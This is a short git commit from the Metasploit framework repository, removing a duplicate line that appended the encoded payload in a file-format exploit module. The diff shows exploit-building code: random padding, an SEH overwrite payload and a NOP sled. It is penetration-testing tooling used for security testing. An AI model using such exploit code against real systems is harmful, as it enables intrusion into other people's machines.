remove extra copy of the payload

git-svn-id: file:///home/svn/framework3/trunk@10227 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-09-03 00:43:44 +00:00
parent 62e27afa36
commit 471ae29269
1 changed files with 0 additions and 2 deletions

View File

@ -69,8 +69,6 @@ class Metasploit3 < Msf::Exploit::Remote
sploit = rand_text_alpha_upper(target['Offset'])
sploit << generate_seh_payload(target.ret)
sploit << "\x90" * 12
sploit << payload.encoded
print_status("Creating '#{datastore['FILENAME']}' file ...")